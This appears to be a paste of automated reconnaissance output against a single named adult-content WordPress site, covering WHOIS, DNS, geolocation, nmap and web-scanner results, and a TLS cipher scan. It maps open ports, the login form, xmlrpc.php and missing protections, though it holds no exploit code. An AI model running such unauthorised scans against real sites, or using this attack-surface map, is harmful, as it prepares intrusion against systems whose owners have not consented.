· 6 years ago · Feb 29, 2020, 08:18 AM
1######################################################################################################################################
2=============================================================================================================================
3Hostname tropistudio.com ISP Shinjiru Technology Sdn Bhd
4Continent Asia Flag
5MY
6Country Malaysia Country Code MY
7Region Unknown Local time 29 Feb 2020 14:33 +08
8City Unknown Postal Code Unknown
9IP Address 111.90.145.39 Latitude 2.5
10 Longitude 112.5
11=========================================================================================================================
12######################################################################################################################################
13> tropistudio.com
14Server: 10.101.0.243
15Address: 10.101.0.243#53
16
17Non-authoritative answer:
18Name: tropistudio.com
19Address: 111.90.145.39
20>
21#######################################################################################################################################
22 Domain Name: TROPISTUDIO.COM
23 Registry Domain ID: 1815359723_DOMAIN_COM-VRSN
24 Registrar WHOIS Server: whois.godaddy.com
25 Registrar URL: http://www.godaddy.com
26 Updated Date: 2020-02-20T23:38:06Z
27 Creation Date: 2013-07-16T00:44:57Z
28 Registry Expiry Date: 2020-07-16T00:44:57Z
29 Registrar: GoDaddy.com, LLC
30 Registrar IANA ID: 146
31 Registrar Abuse Contact Email: abuse@godaddy.com
32 Registrar Abuse Contact Phone: 480-624-2505
33 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
34 Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
35 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
36 Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
37 Name Server: NS11.DOMAINCONTROL.COM
38 Name Server: NS12.DOMAINCONTROL.COM
39 DNSSEC: unsigned
40#####################################################################################################################################
41Domain Name: TROPISTUDIO.COM
42Registry Domain ID: 1815359723_DOMAIN_COM-VRSN
43Registrar WHOIS Server: whois.godaddy.com
44Registrar URL: http://www.godaddy.com
45Updated Date: 2019-07-11T02:59:06Z
46Creation Date: 2013-07-16T00:44:57Z
47Registrar Registration Expiration Date: 2020-07-16T00:44:57Z
48Registrar: GoDaddy.com, LLC
49Registrar IANA ID: 146
50Registrar Abuse Contact Email: abuse@godaddy.com
51Registrar Abuse Contact Phone: +1.4806242505
52Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
53Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
54Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
55Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
56Registrant Organization:
57Registrant State/Province: Florida
58Registrant Country: US
59Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=TROPISTUDIO.COM
60Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=TROPISTUDIO.COM
61Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=TROPISTUDIO.COM
62Name Server: NS11.DOMAINCONTROL.COM
63Name Server: NS12.DOMAINCONTROL.COM
64DNSSEC: unsigned
65#####################################################################################################################################
66[+] Target : tropistudio.com
67
68[+] IP Address : 111.90.145.39
69
70[+] Headers :
71
72[+] Date : Sat, 29 Feb 2020 06:44:18 GMT
73[+] Server : Apache/2
74[+] X-Powered-By : PHP/7.2.18
75[+] X-Pingback : http://tropistudio.com/xmlrpc.php
76[+] Link : <http://tropistudio.com/wp-json/>; rel="https://api.w.org/", <http://tropistudio.com/>; rel=shortlink
77[+] Vary : Accept-Encoding,User-Agent
78[+] Content-Encoding : gzip
79[+] Content-Length : 17308
80[+] Keep-Alive : timeout=2, max=100
81[+] Connection : Keep-Alive
82[+] Content-Type : text/html; charset=UTF-8
83
84[+] SSL Certificate Information :
85
86[+] countryName : US
87[+] stateOrProvinceName : Someprovince
88[+] localityName : Sometown
89[+] organizationName : none
90[+] organizationalUnitName : none
91[+] commonName : localhost
92[+] emailAddress : webmaster@localhost
93[+] countryName : US
94[+] stateOrProvinceName : Someprovince
95[+] localityName : Sometown
96[+] organizationName : none
97[+] organizationalUnitName : none
98[+] commonName : localhost
99[+] emailAddress : webmaster@localhost
100[+] Version : 1
101[+] Serial Number : 99F41CDF5E898913
102[+] Not Before : May 3 09:49:26 2019 GMT
103[+] Not After : Sep 17 09:49:26 2046 GMT
104
105[+] Whois Lookup :
106
107[+] NIR : None
108[+] ASN Registry : apnic
109[+] ASN : 45839
110[+] ASN CIDR : 111.90.144.0/21
111[+] ASN Country Code : MY
112[+] ASN Date : 2009-06-17
113[+] ASN Description : SHINJIRU-MY-AS-AP Shinjiru Technology Sdn Bhd, MY
114[+] cidr : 111.90.128.0/19
115[+] name : SHINJIRU-MY
116[+] handle : STSB2-AP
117[+] range : 111.90.128.0 - 111.90.159.255
118[+] description : Shinjiru Technology Sdn Bhd
119[+] country : MY
120[+] state : None
121[+] city : None
122[+] address : 19-2, Wisma Laxton, Jln Desa, Tmn Desa, Jln Klang Lama,, Kuala Lumpur Wilayah Persekutuan 58100
123[+] postal_code : None
124[+] emails : ['noc@shinjiru.com.my', 'abuse@shinjiru.com.my']
125[+] created : None
126[+] updated : None
127
128[+] Crawling Target...
129
130[+] Looking for robots.txt........[ Found ]
131[+] Extracting robots Links.......[ 0 ]
132[+] Looking for sitemap.xml.......[ Found ]
133[+] Extracting sitemap Links......[ 0 ]
134[+] Extracting CSS Links..........[ 11 ]
135[+] Extracting Javascript Links...[ 12 ]
136[+] Extracting Internal Links.....[ 11 ]
137[+] Extracting External Links.....[ 5 ]
138[+] Extracting Images.............[ 6 ]
139
140[+] Total Links Extracted : 45
141
142[+] Dumping Links in /opt/FinalRecon/dumps/tropistudio.com.dump
143[+] Completed!
144######################################################################################################################################
145[i] Scanning Site: http://tropistudio.com
146
147
148
149B A S I C I N F O
150====================
151
152
153[+] Site Title: Tropi Studio – Video collections, Bikini show and more
154[+] IP address: 111.90.145.39
155[+] Web Server: Apache/2
156[+] CMS: WordPress
157[+] Cloudflare: Not Detected
158[+] Robots File: Could NOT Find robots.txt!
159
160
161
162
163W H O I S L O O K U P
164========================
165
166 Domain Name: TROPISTUDIO.COM
167 Registry Domain ID: 1815359723_DOMAIN_COM-VRSN
168 Registrar WHOIS Server: whois.godaddy.com
169 Registrar URL: http://www.godaddy.com
170 Updated Date: 2020-02-20T23:38:06Z
171 Creation Date: 2013-07-16T00:44:57Z
172 Registry Expiry Date: 2020-07-16T00:44:57Z
173 Registrar: GoDaddy.com, LLC
174 Registrar IANA ID: 146
175 Registrar Abuse Contact Email: abuse@godaddy.com
176 Registrar Abuse Contact Phone: 480-624-2505
177 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
178 Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
179 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
180 Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
181 Name Server: NS11.DOMAINCONTROL.COM
182 Name Server: NS12.DOMAINCONTROL.COM
183 DNSSEC: unsigned
184 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
185>>> Last update of whois database: 2020-02-29T06:48:01Z <<<
186
187For more information on Whois status codes, please visit https://icann.org/epp
188
189
190
191The Registry database contains ONLY .COM, .NET, .EDU domains and
192Registrars.
193
194
195
196
197G E O I P L O O K U P
198=========================
199
200[i] IP Address: 111.90.145.39
201[i] Country: Malaysia
202[i] State:
203[i] City:
204[i] Latitude: 2.5
205[i] Longitude: 112.5
206
207
208
209
210H T T P H E A D E R S
211=======================
212
213
214[i] HTTP/1.0 200 OK
215[i] Date: Sat, 29 Feb 2020 06:44:51 GMT
216[i] Server: Apache/2
217[i] X-Powered-By: PHP/7.2.18
218[i] X-Pingback: http://tropistudio.com/xmlrpc.php
219[i] Link: <http://tropistudio.com/wp-json/>; rel="https://api.w.org/"
220[i] Link: <http://tropistudio.com/>; rel=shortlink
221[i] Vary: Accept-Encoding,User-Agent
222[i] Connection: close
223[i] Content-Type: text/html; charset=UTF-8
224
225
226
227
228D N S L O O K U P
229===================
230
231tropistudio.com. 599 IN A 111.90.145.39
232tropistudio.com. 3599 IN NS ns11.domaincontrol.com.
233tropistudio.com. 3599 IN NS ns12.domaincontrol.com.
234tropistudio.com. 3599 IN SOA ns11.domaincontrol.com. dns.jomax.net. 2019110200 28800 7200 604800 600
235tropistudio.com. 3599 IN MX 10 smtp.secureserver.net.
236tropistudio.com. 3599 IN MX 0 mailstore1.secureserver.net.
237
238
239
240
241S U B N E T C A L C U L A T I O N
242====================================
243
244Address = 111.90.145.39
245Network = 111.90.145.39 / 32
246Netmask = 255.255.255.255
247Broadcast = not needed on Point-to-Point links
248Wildcard Mask = 0.0.0.0
249Hosts Bits = 0
250Max. Hosts = 1 (2^0 - 0)
251Host Range = { 111.90.145.39 - 111.90.145.39 }
252
253
254
255N M A P P O R T S C A N
256============================
257
258Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-29 06:49 UTC
259Nmap scan report for tropistudio.com (111.90.145.39)
260Host is up (0.23s latency).
261rDNS record for 111.90.145.39: web16.support-emilid.com
262
263PORT STATE SERVICE
26421/tcp open ftp
26522/tcp closed ssh
26680/tcp open http
267443/tcp open https
268
269Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds
270#####################################################################################################################################
271[+] Starting At 2020-02-29 01:50:39.529099
272[+] Collecting Information On: http://tropistudio.com/
273[#] Status: 200
274--------------------------------------------------
275[#] Web Server Detected: Apache/2
276[#] X-Powered-By: PHP/7.2.18
277[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
278- Date: Sat, 29 Feb 2020 06:46:23 GMT
279- Server: Apache/2
280- X-Powered-By: PHP/7.2.18
281- X-Pingback: http://tropistudio.com/xmlrpc.php
282- Link: <http://tropistudio.com/wp-json/>; rel="https://api.w.org/", <http://tropistudio.com/>; rel=shortlink
283- Vary: Accept-Encoding,User-Agent
284- Content-Encoding: gzip
285- Content-Length: 17308
286- Keep-Alive: timeout=2, max=100
287- Connection: Keep-Alive
288- Content-Type: text/html; charset=UTF-8
289--------------------------------------------------
290[#] Finding Location..!
291[#] status: success
292[#] country: Malaysia
293[#] countryCode: MY
294[#] region: 14
295[#] regionName: Kuala Lumpur
296[#] city: Kuala Lumpur
297[#] zip: 58100
298[#] lat: 3.09677
299[#] lon: 101.676
300[#] timezone: Asia/Kuala_Lumpur
301[#] isp: Shinjiru Technology Sdn Bhd
302[#] org: Shinjiru Technology Sdn Bhd
303[#] as: AS45839 Shinjiru Technology Sdn Bhd
304[#] query: 111.90.145.39
305--------------------------------------------------
306[x] Didn't Detect WAF Presence on: http://tropistudio.com/
307--------------------------------------------------
308[#] Starting Reverse DNS
309[-] Failed ! Fail
310--------------------------------------------------
311[!] Scanning Open Port
312[#] 21/tcp open ftp
313[#] 25/tcp open smtp
314[#] 53/tcp open domain
315[#] 80/tcp open http
316[#] 110/tcp open pop3
317[#] 111/tcp open rpcbind
318[#] 143/tcp open imap
319[#] 443/tcp open https
320[#] 465/tcp open smtps
321[#] 587/tcp open submission
322[#] 993/tcp open imaps
323[#] 995/tcp open pop3s
324[#] 2222/tcp open EtherNetIP-1
325[#] 3306/tcp open mysql
326--------------------------------------------------
327[+] Getting SSL Info
328[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate (_ssl.c:1076)
329--------------------------------------------------
330[+] Collecting Information Disclosure!
331[#] Detecting sitemap.xml file
332[-] sitemap.xml file not Found!?
333[#] Detecting robots.txt file
334[-] robots.txt file not Found!?
335[#] Detecting GNU Mailman
336[-] GNU Mailman App Not Detected!?
337--------------------------------------------------
338[+] Crawling Url Parameter On: http://tropistudio.com/
339--------------------------------------------------
340[#] Searching Html Form !
341[+] Html Form Discovered
342[#] action: http://tropistudio.com/wp-login.php
343[#] class: None
344[#] id: loginform
345[#] method: post
346--------------------------------------------------
347[!] Found 108 dom parameter
348[#] http://tropistudio.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftropistudio.com%2F&format=xml
349[#] http://tropistudio.com//#main-content-wrapper
350[#] http://tropistudio.com//#
351[#] http://tropistudio.com//#
352[#] http://tropistudio.com//#
353[#] http://tropistudio.com//#
354[#] http://tropistudio.com//#
355[#] http://tropistudio.com//#
356[#] http://tropistudio.com//#
357[#] http://tropistudio.com//#
358[#] http://tropistudio.com//#
359[#] http://tropistudio.com//#
360[#] http://tropistudio.com//#
361[#] http://tropistudio.com//#
362[#] http://tropistudio.com//#
363[#] http://tropistudio.com//#
364[#] http://tropistudio.com//#
365[#] http://tropistudio.com//#
366[#] http://tropistudio.com//#
367[#] http://tropistudio.com//#
368[#] http://tropistudio.com//#
369[#] http://tropistudio.com//#
370[#] http://tropistudio.com//#
371[#] http://tropistudio.com//#
372[#] http://tropistudio.com//#
373[#] http://tropistudio.com//#
374[#] http://tropistudio.com//#
375[#] http://tropistudio.com//#
376[#] http://tropistudio.com//#
377[#] http://tropistudio.com//#
378[#] http://tropistudio.com//#
379[#] http://tropistudio.com//#
380[#] http://tropistudio.com//#
381[#] http://tropistudio.com//#
382[#] http://tropistudio.com//#
383[#] http://tropistudio.com//#
384[#] http://tropistudio.com//#
385[#] http://tropistudio.com//#
386[#] http://tropistudio.com//#
387[#] http://tropistudio.com//#
388[#] http://tropistudio.com//#
389[#] http://tropistudio.com//#
390[#] http://tropistudio.com//#
391[#] http://tropistudio.com//#
392[#] http://tropistudio.com//#
393[#] http://tropistudio.com//#
394[#] http://tropistudio.com//#
395[#] http://tropistudio.com//#
396[#] http://tropistudio.com//#
397[#] http://tropistudio.com//#
398[#] http://tropistudio.com//#
399[#] http://tropistudio.com//#
400[#] http://tropistudio.com//#
401[#] http://tropistudio.com//#
402[#] http://tropistudio.com//#
403[#] http://tropistudio.com//#
404[#] http://tropistudio.com//#
405[#] http://tropistudio.com//#
406[#] http://tropistudio.com//#
407[#] http://tropistudio.com//#
408[#] http://tropistudio.com//#
409[#] http://tropistudio.com//#
410[#] http://tropistudio.com//#
411[#] http://tropistudio.com//#
412[#] http://tropistudio.com//#
413[#] http://tropistudio.com//#
414[#] http://tropistudio.com//#
415[#] http://tropistudio.com//#
416[#] http://tropistudio.com//#
417[#] http://tropistudio.com//#
418[#] http://tropistudio.com//#
419[#] http://tropistudio.com//#
420[#] http://tropistudio.com//#
421[#] http://tropistudio.com//#
422[#] http://tropistudio.com//#
423[#] http://tropistudio.com//#
424[#] http://tropistudio.com//#
425[#] http://tropistudio.com//#
426[#] http://tropistudio.com//#
427[#] http://tropistudio.com//#
428[#] http://tropistudio.com//#
429[#] http://tropistudio.com//#
430[#] http://tropistudio.com//#
431[#] http://tropistudio.com//#
432[#] http://tropistudio.com//#
433[#] http://tropistudio.com//#
434[#] http://tropistudio.com//#
435[#] http://tropistudio.com//#
436[#] http://tropistudio.com//#
437[#] http://tropistudio.com//#
438[#] http://tropistudio.com//#
439[#] http://tropistudio.com//#
440[#] http://tropistudio.com//#
441[#] http://tropistudio.com//#
442[#] http://tropistudio.com//#
443[#] http://tropistudio.com//#
444[#] http://tropistudio.com//#
445[#] http://tropistudio.com//#
446[#] http://tropistudio.com//#
447[#] http://tropistudio.com//#
448[#] http://tropistudio.com//#
449[#] http://tropistudio.com//#
450[#] http://tropistudio.com//#
451[#] http://tropistudio.com//#
452[#] http://tropistudio.com//#
453[#] http://tropistudio.com//#
454[#] http://tropistudio.com//#
455[#] http://tropistudio.com//#
456--------------------------------------------------
457[!] 3 Internal Dynamic Parameter Discovered
458[+] http://tropistudio.com/xmlrpc.php?rsd
459[+] http://tropistudio.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftropistudio.com%2F
460[+] http://tropistudio.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftropistudio.com%2F&format=xml
461--------------------------------------------------
462[!] 1 External Dynamic Parameter Discovered
463[#] https://secure.zombaio.com/SignUp/Affiliate/?45677149
464--------------------------------------------------
465[!] 21 Internal links Discovered
466[+] http://tropistudio.com/xmlrpc.php
467[+] http://tropistudio.com/feed/
468[+] http://tropistudio.com/comments/feed/
469[+] http://tropistudio.com/sample-page/feed/
470[+] http://tropistudio.com/wp-includes/wlwmanifest.xml
471[+] http://tropistudio.com/
472[+] http://tropistudio.com/
473[+] http://tropistudio.com/
474[+] http://tropistudio.com/vip-membership/
475[+] http://tropistudio.com/join/
476[+] http://tropistudio.com/join/
477[+] http://tropistudio.com/vip-membership/
478[+] http://tropistudio.com/full-list-of-videos-by-name/
479[+] http://tropistudio.com/roxy-blue-panties/
480[+] http://tropistudio.com/roxy-red-calentico-part-2/
481[+] http://tropistudio.com/roxy-red-calentico-1/
482[+] http://tropistudio.com/rosy-short-short-part-2/
483[+] http://tropistudio.com/rosy-short-short-part-1/
484[+] http://tropistudio.com/rosy-modeling-in-black-2/
485[+] http://tropistudio.com/rosy-modeling-in-black-1/
486[+] http://tropistudio.com/
487--------------------------------------------------
488[!] 4 External links Discovered
489[#] http://collectable18.com/contact-us-2/
490[#] http://sexypixel.com/terms-of-service/
491[#] http://sexypixel.com/privacy-policy/
492[#] http://collectable18.com/2257-2/
493--------------------------------------------------
494[#] Mapping Subdomain..
495[!] Found 1 Subdomain
496- tropistudio.com
497--------------------------------------------------
498[!] Done At 2020-02-29 01:51:04.432543
499########################################################################################################################
500Trying "tropistudio.com"
501;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49833
502;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 4
503
504;; QUESTION SECTION:
505;tropistudio.com. IN ANY
506
507;; ANSWER SECTION:
508tropistudio.com. 3600 IN MX 10 smtp.secureserver.net.
509tropistudio.com. 3600 IN MX 0 mailstore1.secureserver.net.
510tropistudio.com. 3600 IN SOA ns11.domaincontrol.com. dns.jomax.net. 2019110200 28800 7200 604800 600
511tropistudio.com. 600 IN A 111.90.145.39
512tropistudio.com. 3600 IN NS ns11.domaincontrol.com.
513tropistudio.com. 3600 IN NS ns12.domaincontrol.com.
514
515;; ADDITIONAL SECTION:
516ns11.domaincontrol.com. 34177 IN A 97.74.105.6
517ns12.domaincontrol.com. 6421 IN A 173.201.73.6
518ns11.domaincontrol.com. 34177 IN AAAA 2603:5:2190::6
519ns12.domaincontrol.com. 22174 IN AAAA 2603:5:2290::6
520
521Received 299 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 76 ms
522########################################################################################################################
523; <<>> DiG 9.11.14-3-Debian <<>> +trace tropistudio.com any
524;; global options: +cmd
525. 42504 IN NS e.root-servers.net.
526. 42504 IN NS l.root-servers.net.
527. 42504 IN NS i.root-servers.net.
528. 42504 IN NS c.root-servers.net.
529. 42504 IN NS k.root-servers.net.
530. 42504 IN NS d.root-servers.net.
531. 42504 IN NS b.root-servers.net.
532. 42504 IN NS f.root-servers.net.
533. 42504 IN NS h.root-servers.net.
534. 42504 IN NS a.root-servers.net.
535. 42504 IN NS m.root-servers.net.
536. 42504 IN NS j.root-servers.net.
537. 42504 IN NS g.root-servers.net.
538. 42504 IN RRSIG NS 8 0 518400 20200313050000 20200229040000 33853 . mVs4uQdMopa/zf/Knpik7ZM/d8Pf9QmdvQFd26/yexD0ZPmAgekyl7+K 4B3+0AzUn4l9BZYqaV0PmQLm6XWL4qRHsOGRPNssISKwSgMr1qx3WgPI vtg3ZSTApzG8RTNuVpPfm6k8Nsj6s8PQcueRoCH9aJL0nuthlFPfxuUF fspQuV+G7+otwNioS7xtSiB1nw37jVJ211ZvKXyN9OwYATNq2lzJFPfw Tok8HfOksLL2Q9rWfBgaOe33kj2VetNRGlMzVo/+MHlrT4pQTsUtkXAI Pya+0pE7Hz3bOloEVHd+qejYKzgelg/qnzdg1vOunwRX5zV4ycklleyV lUL/cQ==
539;; Received 525 bytes from 10.101.0.243#53(10.101.0.243) in 192 ms
540
541com. 172800 IN NS l.gtld-servers.net.
542com. 172800 IN NS b.gtld-servers.net.
543com. 172800 IN NS c.gtld-servers.net.
544com. 172800 IN NS d.gtld-servers.net.
545com. 172800 IN NS e.gtld-servers.net.
546com. 172800 IN NS f.gtld-servers.net.
547com. 172800 IN NS g.gtld-servers.net.
548com. 172800 IN NS a.gtld-servers.net.
549com. 172800 IN NS h.gtld-servers.net.
550com. 172800 IN NS i.gtld-servers.net.
551com. 172800 IN NS j.gtld-servers.net.
552com. 172800 IN NS k.gtld-servers.net.
553com. 172800 IN NS m.gtld-servers.net.
554com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
555com. 86400 IN RRSIG DS 8 1 86400 20200313050000 20200229040000 33853 . O84AhRjx3Mrr2qlshx2ZCLVrPqDS7S3hzGWRplelL0y0CuxrQAj1tv1O TcffI415OVIDjJOPEpDmeObTSEXoNBewKT1VKoP0ciQKh147cNvNyMD/ TGIQjNJvY37rKxN/y4dBEswwLCwd/z2LsDIxbWtexqFyEcw6sVV0eW37 60tbNldCS7aGObABmT16lox2fMDc7Rx+uDAJ+BItyeeH+UJFsDFJMVvK k9MFdK82MSjG9HamvR8HFgXo+VICZLuuN9muONkuJEh0Nxd4OyimS4wH 986BIRAeKm7sY26YEirMvpRG8dY9g3z3eTccDDREXiHkEQWWbOublNkY wwcJGg==
556;; Received 1175 bytes from 192.5.5.241#53(f.root-servers.net) in 134 ms
557
558tropistudio.com. 172800 IN NS ns11.domaincontrol.com.
559tropistudio.com. 172800 IN NS ns12.domaincontrol.com.
560CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
561CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20200306054846 20200228043846 56311 com. ISlSTbM2Rr7hSkdZb502vqE56k7NteB7n7cJ6VvOiel5+a3mCMy7m9yY t3hZxwkxEGhmaJcjOSU6Eyn8uerhauVDlu7+tt3FOgv/MiOU2Bxz+t5y 323Oo9UbrgS1a/H7UBKkwpObcd/r4fwmqiQMXrBddG7oLjZRX3XCgkq6 ck2ccaFhnnZtoMD0xByNngTahGcMOd7nCFSL+ss5T9lkEw==
562RVR5I32GAQNE94CMU3AU2VLJJB55OUFM.com. 86400 IN NSEC3 1 1 0 - RVR6M3ALUNKONDN40OAB1GS521CMMNHV NS DS RRSIG
563RVR5I32GAQNE94CMU3AU2VLJJB55OUFM.com. 86400 IN RRSIG NSEC3 8 2 86400 20200307061014 20200229050014 56311 com. VPalofbAY9lcMZpREQDz4OElavbVbKGBpyqJG38bubv3Bey9m2/zo2f9 i0LgFGCr+qHZEPEhLBj83l1K5Zbh4/diNrhQuv61AIHoY4IZ00+k0H3k HT/syPfl316mdzvCdFHhI+YY8H+Q8PM/32pN0mANGZUgul2oI4m7/961 6zRgylACHacZkpGYVq2UsHaxEXtrMAOF3BR6QL6Bruiy2Q==
564;; Received 733 bytes from 192.12.94.30#53(e.gtld-servers.net) in 163 ms
565
566tropistudio.com. 600 IN A 111.90.145.39
567tropistudio.com. 3600 IN NS ns11.domaincontrol.com.
568tropistudio.com. 3600 IN NS ns12.domaincontrol.com.
569tropistudio.com. 3600 IN SOA ns11.domaincontrol.com. dns.jomax.net. 2019110200 28800 7200 604800 600
570tropistudio.com. 3600 IN MX 10 smtp.secureserver.net.
571tropistudio.com. 3600 IN MX 0 mailstore1.secureserver.net.
572;; Received 222 bytes from 173.201.73.6#53(ns12.domaincontrol.com) in 163 ms
573########################################################################################################################
574[*] Performing General Enumeration of Domain: tropistudio.com
575[-] DNSSEC is not configured for tropistudio.com
576[*] SOA ns11.domaincontrol.com 97.74.105.6
577[*] NS ns12.domaincontrol.com 173.201.73.6
578[*] NS ns12.domaincontrol.com 2603:5:2290::6
579[*] NS ns11.domaincontrol.com 97.74.105.6
580[*] NS ns11.domaincontrol.com 2603:5:2190::6
581[*] MX mailstore1.secureserver.net 68.178.213.243
582[*] MX mailstore1.secureserver.net 68.178.213.244
583[*] MX mailstore1.secureserver.net 72.167.238.32
584[*] MX smtp.secureserver.net 68.178.213.37
585[*] MX smtp.secureserver.net 72.167.238.29
586[*] MX smtp.secureserver.net 68.178.213.203
587[*] A tropistudio.com 111.90.145.39
588[*] Enumerating SRV Records
589[*] SRV _autodiscover._tcp.tropistudio.com autodiscover.secureserver.net 184.168.128.9 443 0
590[+] 1 Records Found
591########################################################################################################################
592 AVAILABLE PLUGINS
593 -----------------
594
595 FallbackScsvPlugin
596 HttpHeadersPlugin
597 EarlyDataPlugin
598 HeartbleedPlugin
599 CertificateInfoPlugin
600 RobotPlugin
601 OpenSslCipherSuitesPlugin
602 OpenSslCcsInjectionPlugin
603 SessionResumptionPlugin
604 SessionRenegotiationPlugin
605 CompressionPlugin
606
607
608
609 CHECKING HOST(S) AVAILABILITY
610 -----------------------------
611
612 111.90.145.39:443 => 111.90.145.39
613
614
615
616
617 SCAN RESULTS FOR 111.90.145.39:443 - 111.90.145.39
618 --------------------------------------------------
619
620 * Session Renegotiation:
621 Client-initiated Renegotiation: OK - Rejected
622 Secure Renegotiation: OK - Supported
623
624 * TLS 1.2 Session Resumption Support:
625 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
626 With TLS Tickets: OK - Supported
627
628 * Deflate Compression:
629 OK - Compression disabled
630
631 * OpenSSL CCS Injection:
632 OK - Not vulnerable to OpenSSL CCS injection
633
634 * Downgrade Attacks:
635 TLS_FALLBACK_SCSV: OK - Supported
636
637 * SSLV2 Cipher Suites:
638 Server rejected all cipher suites.
639
640 * TLSV1_3 Cipher Suites:
641 Server rejected all cipher suites.
642
643 * SSLV3 Cipher Suites:
644 Server rejected all cipher suites.
645
646 * OpenSSL Heartbleed:
647 OK - Not vulnerable to Heartbleed
648
649 * ROBOT Attack:
650 OK - Not vulnerable
651
652 * Certificate Information:
653 Content
654 SHA1 Fingerprint: 8d35b1fb5d2f9ae30d01a319f32303fdc6b13573
655 Common Name: localhost
656 Issuer: localhost
657 Serial Number: 11093523527809730835
658 Not Before: 2019-05-03 09:49:26
659 Not After: 2046-09-17 09:49:26
660 Signature Algorithm: sha1
661 Public Key Algorithm: RSA
662 Key Size: 2048
663 Exponent: 65537 (0x10001)
664 DNS Subject Alternative Names: []
665
666 Trust
667 Hostname Validation: FAILED - Certificate does NOT match 111.90.145.39
668 Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
669 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
670 Java CA Store (jdk-12.0.1): FAILED - Certificate is NOT Trusted: self signed certificate
671 Mozilla CA Store (2019-03-14): FAILED - Certificate is NOT Trusted: self signed certificate
672 Windows CA Store (2019-05-27): FAILED - Certificate is NOT Trusted: self signed certificate
673 Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
674 Received Chain: localhost
675 Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
676 Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
677 Received Chain Order: OK - Order is valid
678 Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
679
680 Extensions
681 OCSP Must-Staple: NOT SUPPORTED - Extension not found
682 Certificate Transparency: NOT SUPPORTED - Extension not found
683
684 OCSP Stapling
685 NOT SUPPORTED - Server did not send back an OCSP response
686
687 * TLSV1_2 Cipher Suites:
688 Forward Secrecy OK - Supported
689 RC4 OK - Not Supported
690
691 Preferred:
692 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
693 Accepted:
694 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
695 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
696 TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
697 TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
698 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
699 TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
700 TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
701 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
702 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
703 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
704 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
705 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
706 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
707 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
708 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
709 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
710 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
711 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
712 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
713 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
714 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
715 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
716 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
717 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
718
